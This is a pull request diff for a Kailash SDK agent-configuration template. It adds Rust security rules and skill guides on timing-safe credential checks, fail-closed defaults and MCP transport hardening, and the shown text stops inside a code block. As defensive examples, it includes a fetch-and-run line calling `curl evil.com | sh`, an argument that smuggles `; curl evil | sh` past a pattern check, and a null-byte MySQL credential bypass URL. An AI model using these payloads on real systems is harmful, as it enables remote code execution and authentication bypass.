### PR TITLE
chore(sync): 2.7.0 — loom 2.8.1 / kailash-rs 3.15.1 (R1+R3 security)

### DIFF
--- a/.claude/VERSION
+++ b/.claude/VERSION
@@ -1,16 +1,29 @@
 {
-  "version": "2.6.0",
+  "version": "2.7.0",
   "type": "coc-use-template",
   "description": "COC USE template for Python/Ruby developers using Rust-backed Kailash bindings",
-  "released": "2026-04-12",
+  "released": "2026-04-13",
   "upstream": {
     "name": "kailash",
     "type": "coc-source",
-    "version": "2.8.0",
-    "build_version": "3.12.0",
-    "synced_at": "2026-04-12T12:00:00+08:00"
+    "version": "2.8.1",
+    "build_version": "3.15.1",
+    "synced_at": "2026-04-13T00:00:00+08:00"
   },
   "changelog": [
+    {
+      "version": "2.7.0",
+      "date": "2026-04-13",
+      "summary": "Sync loom 2.8.1 / kailash-rs 3.15.1 — R1+R3 security patterns. 3 new Rust security sub-skills (constant-time comparison, fail-closed defaults, network transport hardening). Updated 18-security-patterns SKILL.md variant with Rust-Specific Sub-Files table + H1-H6 Red Team patterns. rules/security.md upgraded from old global to new rs variant (restores Credential Decode Helpers Python section AND adds 3 Rust MUST clauses). SDK pin kailash-enterprise 3.12.0->3.15.1.",
+      "changes": [
+        "NEW: skills/18-security-patterns/constant-time-comparison-rs.md — bitwise-OR credential loops, shared kailash-auth helper, .any() anti-pattern, audit grep. Origin: journal 0021-RISK-r3-timing-leak-mcp-auth.md, fixed in commit 173d054b.",
+        "NEW: skills/18-security-patterns/fail-closed-defaults-rs.md — 5 canonical examples: thread-local clearance default, registry reject-duplicates, 0o600 file permissions, allowlist path loading, unsafe Send/Sync invariant enforcement. Origin: journal 0018, PR #334.",
+        "NEW: skills/18-security-patterns/network-security-rs.md — DNS rebinding guard on HTTP MCP, stdio argv/env allowlist, log content fingerprinting. Origin: R3 commits 173d054b, 0d4ebd12.",
+        "UPDATED: skills/18-security-patterns/SKILL.md — Rust-Specific Sub-Files table, H1-H6 Red Team Security Patterns section with Rust code.",
+        "UPDATED: rules/security.md — 3 new MUST clauses (Rust: Credential Comparison, Rust: Fail-Closed Security Defaults, Rust: Network Transport Hardening) + restored Credential Decode Helpers Python section that had drifted from loom global.",
+        "UPDATED: pyproject.toml — SDK pin kailash-enterprise 3.12.0->3.15.1."
+      ]
+    },
     {
       "version": "2.6.0",
       "date": "2026-04-12",

--- a/.claude/rules/security.md
+++ b/.claude/rules/security.md
@@ -33,6 +33,58 @@ All database queries MUST use parameterized queries or ORM.
 ✅ User.query.filter_by(id=user_id)  # ORM
 ```
 
+## Credential Decode Helpers
+
+Connection strings carry credentials in URL-encoded form. Decoding them at a call site with `unquote(parsed.password)` is BLOCKED — every decode site MUST route through a shared helper module so the validation logic lives in exactly one place and drift between sites is impossible.
+
+### 1. Null-Byte Rejection At Every Credential Decode Site (MUST)
+
+Every URL parsing site that extracts `user`/`password` from `urlparse(connection_string)` MUST route through a single shared helper that rejects null bytes after percent-decoding. Hand-rolled `unquote(parsed.password)` at a call site is BLOCKED.
+
+```python
+# DO — route through the shared helper
+from myapp.utils.url_credentials import decode_userinfo_or_raise
+
+parsed = urlparse(connection_string)
+user, password = decode_userinfo_or_raise(parsed)  # raises on \x00 after unquote
+
+# DO NOT — hand-rolled at the call site
+from urllib.parse import unquote
+parsed = urlparse(connection_string)
+user = unquote(parsed.username or "")
+password = unquote(parsed.password or "")  # no null-byte check, drifts from other sites
+```
+
+**BLOCKED rationalizations:**
+
+- "The existing site already has the check"
+- "This is a new dialect, the rule doesn't apply yet"
+- "We'll consolidate later"
+- "The URL comes from a trusted config file, null bytes can't happen"
+
+**Why:** A crafted `mysql://user:%00bypass@host/db` decodes to `\x00bypass`; the MySQL C client truncates credentials at the first null byte and the driver sends an empty password, succeeding against any row in `mysql.user` with an empty `authentication_string`. Drift between sites that have the check and sites that don't is unauditable without a single helper.
+
+### 2. Pre-Encoder Consolidation (MUST)
+
+Password pre-encoding helpers (`quote_plus` of `#$@?` etc.) MUST live in the same shared helper module as the decode path. Per-adapter copies are BLOCKED.
+
+```python
+# DO — single helper module owns both halves of the contract
+from myapp.utils.url_credentials import (
+    preencode_password_special_chars,
+    decode_userinfo_or_raise,
+)
+url = preencode_password_special_chars(raw_url)
+parsed = urlparse(url)
+user, password = decode_userinfo_or_raise(parsed)
+
+# DO NOT — inline pre-encode in each adapter
+pwd = pwd.replace("@", "%40").replace(":", "%3A").replace("#", "%23")
+url = f"postgresql://{user}:{pwd}@{host}/{db}"  # drifts from decode path silently
+```
+
+**Why:** Encode and decode are dual halves of one contract; splitting them across modules guarantees one half drifts. Round-trip tests are only meaningful when both ends share the helper.
+
 ## Input Validation
 
 All user input MUST be validated before use: type checking, length limits, format validation, whitelist when possible. Applies to API endpoints, CLI inputs, file uploads, form submissions.
@@ -72,6 +124,79 @@ All user-generated content MUST be encoded before display in HTML templates, JSO
 - **DataFlow**: Access controls on models, validate at model level, never expose internal IDs
 - **Nexus**: Authentication on protected routes, rate limiting, CORS configured
 - **Kaizen**: Prompt injection protection, sensitive data filtering, output validation
+
+## Rust: Credential Comparison (MUST)
+
+Every credential / token / HMAC / API key comparison in Rust code MUST use `kailash_auth::validate_token_against_list` (list) or `kailash_auth::constant_time_eq` (single) — NEVER `==`, NEVER `.any()` over a constant-time inner comparison.
+
+```rust
+// DO — single helper, always walks full list
+let ok = kailash_auth::validate_token_against_list(token, valid_keys);
+
+// DO NOT — .any() short-circuits, leaks match position via timing
+let ok = valid_keys.iter().any(|k| constant_time_eq(token, k));
+```
+
+**Why:** `.any()` returns on first match, revealing _which position_ matched via response timing. During key rotation this narrows brute force by one key's worth of entropy per observation. Origin: R3 red team finding `0021-RISK-r3-timing-leak-mcp-auth.md`, fixed in commit `173d054b`. Full pattern: `skills/18-security-patterns/constant-time-comparison-rs.md`.
+
+**BLOCKED rationalizations:**
+
+- "The inner comparison is constant-time, so the loop is fine"
+- "Only one valid key in production, the iterator doesn't loop"
+- "We'll use `.any()` now and switch when we add rotation"
+
+## Rust: Fail-Closed Security Defaults (MUST)
+
+Every `Default` impl, `default()` constructor, and builder-chain starting value on a security-adjacent type MUST be the most restrictive, non-functional state. Permissive behavior is explicit opt-in only.
+
+```rust
+// DO — fail-closed default
+thread_local! {
+    static CALLER_CLEARANCE: Cell<ClassificationLevel> = const {
+        Cell::new(ClassificationLevel::Public)  // Public = most restrictive
+    };
+}
+
+// DO NOT — fail-open default
+thread_local! {
+    static CALLER_CLEARANCE: Cell<ClassificationLevel> =
+        Cell::new(ClassificationLevel::HighlyConfidential);  // anyone who forgot set_clearance sees PII
+}
+```
+
+Applies to: classification/clearance levels, registry insert, file permissions (0o600 on audit/evidence files), path containment (allowlist, not free path), posture/tenant selection, delegation keys, and unsafe `Send`/`Sync` invariants.
+
+**Why:** Four of six HIGH findings in R1 shared a single root cause — permissive defaults silently disabled security features that operators believed were enabled. Origin: `0018-RISK-six-high-security-findings.md`, fixed in PR #334. Full pattern: `skills/18-security-patterns/fail-closed-defaults-rs.md`.
+
+**BLOCKED rationalizations:**
+
+- "The caller will always configure this"
+- "Backwards compat requires the permissive default"
+- "Fail-closed will break tests that don't set the field"
+
+## Rust: Network Transport Hardening (MUST)
+
+HTTP MCP transports MUST validate `Origin`/`Host` against an allowlist before dispatching any JSON-RPC method. Stdio MCP transports MUST restrict spawn to an allowlisted `{command, arg regex, env key}` triple. Log lines including rejected credential / token / identifier content MUST fingerprint the content, never echo it.
+
+```rust
+// DO — explicit origin allowlist
+let origin = req.headers().get("origin").and_then(|v| v.to_str().ok()).unwrap_or("");
+if !self.allowed_origins.contains(origin) {
+    return Response::builder().status(StatusCode::FORBIDDEN).body(...).unwrap();
+}
+
+// DO NOT — trust everything that reaches the bind address
+// (DNS rebinding attack: attacker-controlled DNS -> 127.0.0.1, browser sends the attacker's cookies)
+dispatch(req).await
+```
+
+**Why:** Local-only MCP servers bind to 127.0.0.1 and assume localhost = trusted. DNS rebinding defeats this — a website the operator visits while the MCP server runs can invoke local MCP tools via the browser. Stdio spawn without allowlist gives the JSON-RPC caller arbitrary code execution via `sh -c`, `LD_PRELOAD`, or argv injection. Log content without sanitization is a log-poisoning + secret-exfiltration vector. Origin: R3 commits `173d054b`, `0d4ebd12`. Full pattern: `skills/18-security-patterns/network-security-rs.md`.
+
+**BLOCKED rationalizations:**
+
+- "127.0.0.1 binding is enough"
+- "The caller specifies the command, we just run it"
+- "Logging the rejected token helps debugging"
 
 ## Exceptions
 

--- a/.claude/settings.json
+++ b/.claude/settings.json
@@ -1,6 +1,6 @@
 {
   "$schema": "https://json.schemastore.org/claude-code-settings.json",
-  "description": "Kailash COC Claude (Python) - Claude Code hooks configuration",
+  "description": "Kailash COC Claude (Rust-backed bindings) - Claude Code hooks configuration",
   "env": {
     "CLAUDE_CODE_EXPERIMENTAL_AGENT_TEAMS": "1"
   },

--- a/.claude/skills/18-security-patterns/SKILL.md
+++ b/.claude/skills/18-security-patterns/SKILL.md
@@ -7,13 +7,23 @@ description: "Security patterns and best practices for Kailash SDK including inp
 
 Mandatory security patterns for all Kailash SDK development. These patterns prevent common vulnerabilities and ensure secure application development.
 
+## Rust-Specific Sub-Files
+
+| File                                                                 | Topic                                                                                                                                | Origin                                                                   |
+| -------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------ | ------------------------------------------------------------------------ |
+| [`constant-time-comparison-rs.md`](./constant-time-comparison-rs.md) | Bitwise-OR credential loops, shared `kailash-auth` helper, anti-`.any()` pattern                                                     | journal `0021-RISK-r3-timing-leak-mcp-auth.md`                           |
+| [`fail-closed-defaults-rs.md`](./fail-closed-defaults-rs.md)         | Restrictive `Default` impls, registry reject-duplicates, 0o600 file permissions, allowlist path loading, unsafe Send/Sync invariants | journal `0018-RISK-six-high-security-findings.md` (R1 six HIGH findings) |
+| [`network-security-rs.md`](./network-security-rs.md)                 | DNS rebinding guard on HTTP MCP, stdio argv/env allowlist, log content fingerprinting                                                | R3 commits `173d054b`, `0d4ebd12`                                        |
+| [`security-auth-middleware-rs.md`](./security-auth-middleware-rs.md) | Axum auth middleware composition, tower layers                                                                                       | prior                                                                    |
+
 ## Overview
 
 Security patterns cover:
 
 - Secret management (no hardcoded credentials)
 - Input validation (prevent injection attacks)
-- Authentication and authorization
+- Authentication and authorization (constant-time comparison, fail-closed defaults)
+- Network hardening (DNS rebinding, stdio allowlist, log sanitization)
 - OWASP Top 10 prevention
 - Secure API design
 - Environment variable handling
@@ -132,6 +142,98 @@ All 8 EATP constraint dimension sub-structs have `#[serde(deny_unknown_fields)]`
 ### Auth Config Debug Redaction
 
 `ApiKeyConfig` and `JwtConfig` both implement manual `Debug` that redacts sensitive fields. `TenantContext` is non-Clone with `SecretString` zeroed on drop.
+
+## Red Team Security Patterns (v3.12.2, PRs #324-#335)
+
+### Classification Fail-Closed Default (H1)
+
+Thread-local caller clearance MUST default to most restrictive level, not least restrictive.
+
+```rust
+// DO — fail-closed: unconfigured callers see only Public data
+thread_local! {
+    static CALLER_CLEARANCE: RefCell<ClassificationLevel> = RefCell::new(ClassificationLevel::Public);
+}
+
+// DO NOT — fail-open: unconfigured callers bypass all redaction
+static CALLER_CLEARANCE: RefCell<ClassificationLevel> = RefCell::new(ClassificationLevel::HighlyConfidential);
+```
+
+**Why:** Defaulting to the highest clearance makes the entire redaction system a no-op for any caller that forgets to set clearance. Fail-closed means unset callers get the safest behavior.
+
+### Authority Registry Duplicate Protection (H2)
+
+`Registry::register` MUST reject duplicate keys. Intentional rotation uses explicit `replace(force_replace=true)`.
+
+```rust
+// DO — reject duplicate, require explicit force for rotation
+if registry.contains_key(&org_id) {
+    return Err(AuthorityError::DuplicateOrgId { org_id });
+}
+
+// DO NOT — silently overwrite existing authority
+registry.insert(org_id, new_authority); // attacker replaces legitimate authority
+```
+
+### File Permissions for Security-Sensitive Stores (H3/H4)
+
+Audit stores, evidence sinks, and files containing PII/signatures MUST chmod 0o600 on creation.
+
+```rust
+// DO — restrictive permissions on security-sensitive files
+#[cfg(unix)]
+{
+    use std::os::unix::fs::PermissionsExt;
+    std::fs::set_permissions(&path, std::fs::Permissions::from_mode(0o600))?;
+}
+
+// DO NOT — rely on umask (world-readable audit logs)
+std::fs::write(&path, data)?; // inherits process umask, often 0o644
+```
+
+### Model Path Validation (H5 -- kailash-align-serving)
+
+`allowed_model_roots: Vec<PathBuf>` pattern -- default-deny if empty.
+
+```rust
+// DO — canonicalize + symlink rejection + device-file rejection + root containment
+fn validate_path(path: &Path, allowed_roots: &[PathBuf]) -> Result<PathBuf> {
+    if allowed_roots.is_empty() { return Err(ModelPathError::NoRootsConfigured); }
+    let canonical = path.canonicalize()?;
+    if canonical.is_symlink() { return Err(ModelPathError::SymlinkRejected); }
+    if !allowed_roots.iter().any(|r| canonical.starts_with(r)) {
+        return Err(ModelPathError::OutsideAllowedRoots);
+    }
+    Ok(canonical)
+}
+
+// DO NOT — trust caller-supplied paths
+let model = load_model(user_supplied_path)?; // path traversal, symlink escape
+```
+
+### Unsafe Send+Sync with Inference Latch (H6)
+
+When wrapping non-thread-safe C libraries, use an internal `Mutex<()>` to serialize all FFI calls.
+
+```rust
+// DO — inference latch serializes all FFI access
+struct Backend {
+    ctx: *mut ffi::Context,        // non-thread-safe C pointer
+    inference_latch: Mutex<()>,    // serializes all FFI calls
+}
+impl Backend {
+    fn generate(&self, prompt: &str) -> Result<String> {
+        let _guard = self.inference_latch.lock().unwrap();
+        unsafe { ffi::generate(self.ctx, prompt) } // serialized
+    }
+}
+
+// DO NOT — rely on external RwLock read guard (&self still allows parallel reads)
+unsafe impl Send for Backend {}
+unsafe impl Sync for Backend {} // SAFETY comment says "RwLock protects" but &self methods run in parallel
+```
+
+**Why:** `&self` methods under an external `RwLock<Backend>` still allow multiple concurrent readers. The internal `Mutex<()>` is the only guarantee that FFI calls are truly serialized.
 
 ## Integration with Rules
 

--- a/.claude/skills/18-security-patterns/constant-time-comparison-rs.md
+++ b/.claude/skills/18-security-patterns/constant-time-comparison-rs.md
@@ -1,0 +1,97 @@
+# Constant-Time Comparison Patterns (Rust)
+
+All credential / token / HMAC equality checks in the Kailash Rust SDK MUST be constant-time to prevent timing side-channel attacks. This file documents the correct pattern, the bugs it prevents, and the enforcement points.
+
+Origin: journal `0021-RISK-r3-timing-leak-mcp-auth.md` — R3 red team found `kailash-nexus/src/mcp/auth.rs:275` used `.any()` over a list of valid API keys, which short-circuits on first match and leaks the matching position through timing. The fix pattern already existed in `kailash-auth/src/api_key.rs:116` and should have been reused.
+
+## The Rule
+
+**Every constant-time comparison MUST use bitwise-OR accumulation across a loop, NOT `Iterator::any()`.**
+
+```rust
+// DO — bitwise OR accumulation, always walks the full list
+fn validate_api_key(token: &str, valid_keys: &[String]) -> bool {
+    let mut found = false;
+    for key in valid_keys {
+        found |= constant_time_eq(token, key);
+    }
+    found
+}
+
+// DO NOT — .any() short-circuits on first match, leaks position via timing
+fn validate_api_key(token: &str, valid_keys: &[String]) -> bool {
+    valid_keys.iter().any(|key| constant_time_eq(token, key))
+}
+```
+
+**Why `.any()` is wrong even with a constant-time inner comparison**: the individual `constant_time_eq` on each element takes constant time, but the _loop_ exits early on first match. An attacker who can measure response time (sub-millisecond, over many samples) learns _which position_ in the key list matched. During key rotation (when multiple keys are valid), this narrows brute force by one key's worth of entropy per observation. The fix is O(n) always — walk the full list, accumulate via OR, return the accumulator.
+
+## The Helper
+
+The canonical helper lives in `kailash-auth/src/api_key.rs:116-121`. Every Rust crate that validates credentials MUST route through this helper, not re-implement it.
+
+```rust
+// kailash-auth/src/api_key.rs (canonical)
+pub fn validate_token_against_list(token: &str, valid: &[impl AsRef<str>]) -> bool {
+    let mut found = false;
+    for v in valid {
+        found |= constant_time_eq(token, v.as_ref());
+    }
+    found
+}
+```
+
+**Why a single helper**: the R3 finding was a duplicate implementation drift. `kailash-nexus/src/mcp/auth.rs` had its own `constant_time_eq` and its own validation loop. The duplicate was "correct" in isolation but had the `.any()` bug. A single helper is the only audit point that survives refactors.
+
+## Enforcement Checklist
+
+Before adding any credential / token / HMAC comparison to a Rust crate:
+
+1. **Use `kailash_auth::validate_token_against_list`** for list comparisons.
+2. **Use `subtle::ConstantTimeEq`** (via `kailash_auth::constant_time_eq`) for single comparisons — NOT `==` on `&str`, `&[u8]`, or `String`.
+3. **Never short-circuit** a credential loop via `.any()`, `.find()`, `.position()`, or early `return true`.
+4. **Add a regression test** in `tests/regression/` that asserts the loop walks the full list. Test pattern:
+
+   ```rust
+   #[test]
+   fn test_validate_key_walks_full_list() {
+       // First key matches; verify full list still walked by asserting
+       // behavior on a list where later entries are invalid patterns.
+       let valid = vec!["match".to_string(), "".to_string(), "x".to_string()];
+       assert!(validate_token_against_list("match", &valid));
+       // Timing-invariant: same function also returns false for non-match
+       assert!(!validate_token_against_list("nope", &valid));
+   }
+   ```
+
+## Anti-Pattern: Early Return on Length Mismatch
+
+```rust
+// DO NOT — length check leaks the expected length
+fn compare(a: &[u8], b: &[u8]) -> bool {
+    if a.len() != b.len() {
+        return false;
+    }
+    constant_time_eq(a, b)
+}
+```
+
+**Fix**: use `subtle::ConstantTimeEq::ct_eq` on padded buffers, or accept the length leak only when the expected length is not secret (e.g., fixed-size HMAC output).
+
+## Audit Protocol
+
+On every red-team pass, grep for `.any(|` + `constant_time_eq` + `validate|check|verify` across `crates/*/src/**/*.rs`. Any match is a HIGH finding until proven not a credential path.
+
+```bash
+# DO — audit grep
+rg -l 'constant_time_eq' crates/ | xargs rg '\.any\('
+
+# Zero matches required. If any result, add a regression test that fails without the fix.
+```
+
+## Related
+
+- `rules/security.md` — parameterized queries, secret management, credential decode
+- `skills/18-security-patterns/fail-closed-defaults-rs.md` — companion rule on security-adjacent defaults
+- `kailash-auth/src/api_key.rs:116-121` — canonical helper
+- `kailash-nexus/src/mcp/auth.rs:275-285` — example fix site (post-R3)

--- a/.claude/skills/18-security-patterns/fail-closed-defaults-rs.md
+++ b/.claude/skills/18-security-patterns/fail-closed-defaults-rs.md
@@ -1,0 +1,189 @@
+# Fail-Closed Defaults (Rust)
+
+Security-adjacent defaults in the Kailash Rust SDK MUST be restrictive. Every `Default` impl, `default()` constructor, and config builder that touches classification, clearance, file permissions, delegation chains, path loading, or audit durability MUST fail-closed — the permissive behavior is opt-in only.
+
+Origin: journal `0018-RISK-six-high-security-findings.md` — red team round 1 found **four of six HIGH findings shared a single root cause: security-relevant defaults were permissive rather than restrictive**. H1 (classification clearance defaulted to `HighlyConfidential`), H2 (EATP registry silently overwrote entries), H3/H4 (file permissions defaulted to umask, world-readable), H5 (path loading defaulted to "any path"), H6 (unsound `Send`+`Sync` claimed without runtime invariant). All fixed in PR #334.
+
+## The Pattern
+
+For every security-adjacent type, ask: **"If the operator forgets to configure this, what happens?"**
+
+- **Fail-closed** — they get the most restrictive, non-functional state. Must explicitly opt in to permissive behavior. CORRECT.
+- **Fail-open** — they get the permissive state silently. Operators believe they enabled security; they didn't. BLOCKED.
+
+## Canonical Examples (Post-R1)
+
+### 1. Thread-Local Clearance Default
+
+```rust
+// DO — fail-closed: missing clearance means Public, not HighlyConfidential
+thread_local! {
+    static CALLER_CLEARANCE: Cell<ClassificationLevel> = const {
+        Cell::new(ClassificationLevel::Public)
+    };
+}
+
+// DO NOT — fail-open: any thread that forgot set_caller_clearance
+// reads unredacted PII, silently.
+thread_local! {
+    static CALLER_CLEARANCE: Cell<ClassificationLevel> =
+        Cell::new(ClassificationLevel::HighlyConfidential);
+}
+```
+
+**Why**: Operators enable classification believing PII will be redacted. With a fail-open default, PII is only redacted when the caller _explicitly_ sets a clearance level — which is effectively never in default configurations. The entire security feature becomes a no-op.
+
+### 2. Registry / Delegation: Reject Duplicates
+
+```rust
+// DO — register rejects duplicates; intentional rotation uses replace(force_replace=true)
+impl EatpAuthorityRegistry {
+    pub fn register(&mut self, id: AuthorityId, key: VerifyingKey) -> Result<(), RegistryError> {
+        if self.entries.contains_key(&id) {
+            return Err(RegistryError::DuplicateAuthority(id));
+        }
+        self.entries.insert(id, key);
+        Ok(())
+    }
+
+    pub fn replace(&mut self, id: AuthorityId, key: VerifyingKey, force_replace: bool)
+        -> Result<(), RegistryError>
+    {
+        if !force_replace && self.entries.contains_key(&id) {
+            return Err(RegistryError::ReplaceRequiresForce);
+        }
+        self.entries.insert(id, key);
+        Ok(())
+    }
+}
+
+// DO NOT — blind overwrite hijacks delegation chains
+impl EatpAuthorityRegistry {
+    pub fn register(&mut self, id: AuthorityId, key: VerifyingKey) {
+        self.entries.insert(id, key);  // silently replaces existing
+    }
+}
+```
+
+**Why**: A single registry-write permission must not escalate to full delegation control. Blind overwrite means any authority holder can impersonate any other authority by re-registering with a new key.
+
+### 3. File Permissions: 0o600 on Sensitive Files
+
+```rust
+// DO — sensitive files created with 0o600 (owner read/write only)
+use std::os::unix::fs::OpenOptionsExt;
+
+let file = OpenOptions::new()
+    .write(true)
+    .create(true)
+    .mode(0o600)  // BEFORE open: prevents any window where file is world-readable
+    .open(audit_db_path)?;
+
+// Tighten permissions even on pre-existing files:
+#[cfg(unix)]
+std::fs::set_permissions(&audit_db_path, Permissions::from_mode(0o600))?;
+```
+
+**Why**: Default umask (typically `0o022`) produces `0o644` files — world-readable. Audit rows contain HMAC signatures, PII, and role addresses. Evidence JSONL contains queries, tool args. A fail-open default means every operator who enabled audit is leaking audit data to any local user.
+
+### 4. Path Loading: Allowlist, Not Free Path
+
+```rust
+// DO — allowlist-driven, canonicalized, symlink + device-file rejected
+pub struct BackendConfig {
+    /// Roots under which model files may be loaded.
+    /// Empty list = default-deny: no models can be loaded.
+    pub allowed_model_roots: Vec<PathBuf>,
+}
+
+impl LlamaCppBackend {
+    pub fn load_model(&self, path: &Path) -> Result<(), BackendError> {
+        let canonical = path.canonicalize()?;
+
+        // 1. Must be under an allowed root
+        let allowed = self.config.allowed_model_roots.iter()
+            .any(|root| canonical.starts_with(root.canonicalize().unwrap_or(root.clone())));
+        if !allowed {
+            return Err(BackendError::PathOutsideAllowedRoots(canonical));
+        }
+
+        // 2. Reject symlinks (could point outside allowed roots)
+        if path.symlink_metadata()?.file_type().is_symlink() {
+            return Err(BackendError::SymlinksRejected);
+        }
+
+        // 3. Reject device files
+        let meta = std::fs::metadata(&canonical)?;
+        if !meta.is_file() {
+            return Err(BackendError::NotARegularFile);
+        }
+
+        // proceed...
+        Ok(())
+    }
+}
+
+// DO NOT — trust caller path unconditionally
+pub fn load_model(&self, path: &Path) -> Result<(), BackendError> {
+    let bytes = std::fs::read(path)?;  // /etc/passwd, /dev/zero, symlinks — all loadable
+    // ...
+}
+```
+
+**Why**: Model-loading is the primary user-controlled input to the serving layer. Without containment, any caller can read arbitrary host files through the model interface.
+
+### 5. Unsafe Send/Sync: Explicit Invariant + Runtime Enforcement
+
+```rust
+// DO — SAFETY note describes the actual invariant, and runtime enforces it
+/// SAFETY: `llama_context` is a raw pointer to a C struct that is NOT
+/// thread-safe. We enforce single-threaded access by holding
+/// `inference_latch: Mutex<()>` for every `run_generation` call, including
+/// the streaming path which otherwise would take `&self` under a read lock.
+unsafe impl Send for LlamaCppBackend {}
+unsafe impl Sync for LlamaCppBackend {}
+
+impl LlamaCppBackend {
+    fn run_generation(&self, params: GenerateParams) -> Result<String, Error> {
+        let _guard = self.inference_latch.lock().unwrap();  // serializes C API calls
+        // ... call llama_eval / llama_sample under the guard
+        Ok(text)
+    }
+}
+
+// DO NOT — SAFETY note claims an invariant the code doesn't hold
+unsafe impl Sync for LlamaCppBackend {}
+// "SAFETY: RwLock serializes access" — but generate_stream takes &self
+// under a read lock, allowing concurrent calls into the C context.
+```
+
+**Why**: Unsound `Send`/`Sync` impls on FFI types do not fail in single-threaded tests. They surface as undefined behavior under concurrent production load — crashes, corrupted output, or silent data races. Every `unsafe impl Send/Sync` on a type wrapping FFI state MUST state the runtime invariant in the SAFETY comment AND enforce it via a mutex/latch, not just an abstract lock hierarchy.
+
+## Audit Protocol
+
+Run on every red-team pass and before every release:
+
+```bash
+# 1. Find every Default impl on security-adjacent types
+rg 'impl Default for' crates/ | rg -i 'clearance|classification|registry|permissions|config|policy'
+
+# 2. Find every thread_local with a security-relevant Cell
+rg 'thread_local!' crates/ -A 3 | rg -i 'clearance|classification|posture|tenant'
+
+# 3. Find every unsafe impl Send/Sync on FFI types
+rg 'unsafe impl (Send|Sync)' crates/ -B 2 | rg -i 'raw|ffi|llama|cpp|ctx|handle'
+
+# 4. Find every .insert() without prior contains_key() guard on registry types
+rg 'Registry.*\.insert\(' crates/ -B 5
+```
+
+Any match that cannot cite a fail-closed default OR an explicit `force_*` flag for the permissive path is a HIGH finding.
+
+## Related
+
+- `rules/security.md` — top-level security rules
+- `rules/trust-plane-security.md` — trust-plane-specific fail-closed patterns
+- `skills/18-security-patterns/constant-time-comparison-rs.md` — companion rule on credential comparison
+- `crates/eatp/src/authority_registry.rs` — canonical fail-closed registry implementation
+- `crates/kailash-dataflow/src/classification.rs` — fail-closed clearance default
+- `crates/kailash-align-serving/src/backend/llama_cpp.rs` — canonical path containment

--- a/.claude/skills/18-security-patterns/network-security-rs.md
+++ b/.claude/skills/18-security-patterns/network-security-rs.md
@@ -1,0 +1,163 @@
+# Network & Protocol Hardening (Rust)
+
+MCP / HTTP / stdio transport hardening patterns for the Kailash Rust SDK. These rules prevent DNS rebinding, command injection via stdio transport, and log poisoning across every network-facing crate (kailash-nexus, kailash-mcp, trust-plane, kailash-align-serving).
+
+Origin: R3 red team round (2026-04-12) — fixes in commits `173d054b`, `0d4ebd12`. Journal entries `0021-RISK-r3-timing-leak-mcp-auth.md`, `0022-GAP-source-protection-doc-30-crates-missing.md`. Three distinct classes: (1) transport origin validation, (2) stdio argv/env allowlisting, (3) log content sanitization.
+
+## Rule 1: DNS Rebinding Guard on HTTP MCP Transport
+
+HTTP MCP transports MUST validate the `Host` / `Origin` header against a configured allowlist BEFORE dispatching any JSON-RPC method. Trusting whatever `localhost` resolves to at connect time is the DNS rebinding attack surface.
+
+```rust
+// DO — explicit allowlist, checked on every request
+pub struct McpHttpTransport {
+    allowed_origins: HashSet<String>,  // e.g. {"http://127.0.0.1:8080", "http://localhost:8080"}
+}
+
+impl McpHttpTransport {
+    async fn handle(&self, req: Request) -> Response {
+        let origin = req.headers().get("origin")
+            .and_then(|v| v.to_str().ok())
+            .unwrap_or("");
+        if !self.allowed_origins.contains(origin) {
+            return Response::builder()
+                .status(StatusCode::FORBIDDEN)
+                .body("origin not allowed".into())
+                .unwrap();
+        }
+        // ... dispatch
+    }
+}
+
+// DO NOT — trust any request that reaches the bind address
+async fn handle(req: Request) -> Response {
+    // Runs on 127.0.0.1:8080 — "trusted" because localhost
+    // Attack: attacker-controlled DNS name resolves to 127.0.0.1,
+    // served from evil.com, browser sends Origin: https://evil.com,
+    // MCP happily dispatches tool calls on behalf of the attacker.
+    dispatch(req).await
+}
+```
+
+**Why**: Local-only MCP servers bind to `127.0.0.1` and assume all traffic is trusted. DNS rebinding lets a malicious website get the browser to POST JSON-RPC to `127.0.0.1` with the attacker's cookies/origin. Without `Origin` validation, any website the user visits while an MCP server runs can invoke MCP tools — a full remote code execution against local infrastructure.
+
+**Configuration contract**: `allowed_origins` MUST be non-empty. Empty = default-deny (consistent with `fail-closed-defaults-rs.md`). For local dev, the set typically contains `http://127.0.0.1:<port>` and `http://localhost:<port>` — nothing else.
+
+## Rule 2: Stdio Transport Argv / Env Allowlist
+
+Stdio MCP transports MUST validate every `command`, `args` entry, and environment variable key against a strict allowlist. Spawning an arbitrary process from a caller-supplied string is BLOCKED.
+
+```rust
+// DO — allowlist per command, reject unknown flags
+pub struct StdioMcpSpawnConfig {
+    allowed_commands: HashMap<String, CommandSpec>,
+}
+
+pub struct CommandSpec {
+    pub executable: PathBuf,
+    pub allowed_arg_patterns: Vec<Regex>,  // e.g. ^--model=[a-zA-Z0-9._-]+$
+    pub allowed_env_keys: HashSet<String>, // e.g. {"RUST_LOG", "MODEL_PATH"}
+}
+
+impl StdioMcpSpawnConfig {
+    pub fn validate(&self, cmd: &str, args: &[String], env: &HashMap<String, String>)
+        -> Result<&CommandSpec, SpawnError>
+    {
+        let spec = self.allowed_commands.get(cmd)
+            .ok_or_else(|| SpawnError::CommandNotAllowed(cmd.to_string()))?;
+
+        for arg in args {
+            let matches = spec.allowed_arg_patterns.iter()
+                .any(|re| re.is_match(arg));
+            if !matches {
+                return Err(SpawnError::ArgNotAllowed(arg.clone()));
+            }
+        }
+
+        for key in env.keys() {
+            if !spec.allowed_env_keys.contains(key) {
+                return Err(SpawnError::EnvKeyNotAllowed(key.clone()));
+            }
+        }
+
+        Ok(spec)
+    }
+}
+
+// DO NOT — spawn whatever the JSON-RPC request asked for
+async fn spawn_stdio(req: SpawnRequest) -> Result<Child, SpawnError> {
+    Command::new(&req.command)  // `sh -c 'curl evil.com | sh'`
+        .args(&req.args)        // arbitrary argv
+        .envs(&req.env)         // arbitrary env (LD_PRELOAD, PATH, ...)
+        .spawn()
+}
+```
+
+**Why**: Stdio transports are a privileged escalation surface. An MCP client that can specify `command` + `args` + `env` to the server has arbitrary code execution on the server host via `sh -c`, `LD_PRELOAD`, PATH poisoning, or argument injection. The fix is structural: the server knows the small set of commands it will ever spawn (e.g. `kailash-agent`, `llama-server`), and every command has a fixed executable path + regex-validated args + finite env allowlist.
+
+**Regex anchoring**: All patterns MUST be anchored (`^...$`). Unanchored regexes match substrings and let attackers slip `--model=ok; curl evil | sh` past a pattern that was supposed to check `--model=[a-z]+`.
+
+## Rule 3: Log Content Sanitization
+
+Log messages that include user-controlled content MUST either (a) strip control characters and newlines, or (b) log a fingerprint instead of the content. Raw user content in logs is a log-poisoning vector AND leaks secrets into the log pipeline.
+
+```rust
